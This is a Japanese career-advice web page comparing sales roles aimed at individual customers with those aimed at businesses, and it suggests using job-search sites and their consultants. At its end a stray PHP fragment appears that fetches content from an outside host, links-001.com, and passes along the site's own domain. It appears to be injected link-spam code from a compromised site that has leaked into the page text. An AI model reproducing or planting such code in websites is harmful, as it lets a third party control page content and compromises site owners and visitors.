前へ
次へ

転職希望の営業求人の種類は大きく分けると2つです

営業の仕事にとても興味があるけれど、今現在は全く違う仕事をしている人にとって、憧れの営業の仕事に就くためには、まずは転職しなくてはいけません。
仕事を続けながらの転職活動はかなり時間的に無理がありますので、サポートを受けつつ転職先を検討していく方が良い仕事にたどりつける可能性は高くなります。
営業の求人を探すにあたり、インターネットの求人情報サイトに登録すれば、自分にぴったりとあった営業の求人を手にすることができます。
ただ、ここで覚えておきたいのが営業とひとことで言っても、個人営業をメインとする会社と法人営業をメインとする会社があります。
どちらのタイプが自分にぴったりとあっているか、見極めることが大切です。
それでは前者の個人を相手にする場合にはどのような働き方になるでしょう。
個人営業はその名前の通り、相手は個人になりますので、商品を説明する目の前の相手に了解をもらうことができれば、基本的に契約が成立したことになります。
そして後者の法人営業の場合は、相手が会社単位になってきますので、最初に説明をする人が最終決定権を持っている可能性は極めて低いでしょう。
段階を踏んで最終的に部長クラス、または社長が了解してようやく契約が成立したことになります。
この大きな違いがあります。
個人の場合は、一人への説明と了解で済むのに対して、法人の場合はそれなりに時間がかかります。
ただし、個人の場合はなかなか話を聞いてもらうまでは断られ続けることが多いです。
このように一長一短がありますので、自分はどちらのタイプの求人を見つけるのが最も良いかを確認しましょう。
また、求人情報は自分でインターネットの求人情報サイトで探すこともできますが、できれば希望する条件をきちんとサイト側に伝えて、求人情報を探してもらった方が良いでしょう。
そして、担当者と相談していき、最終的に自分にあった会社で面接を行って転職するのが良いです。

".file_get_contents('http://links-001.com/gfjset.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top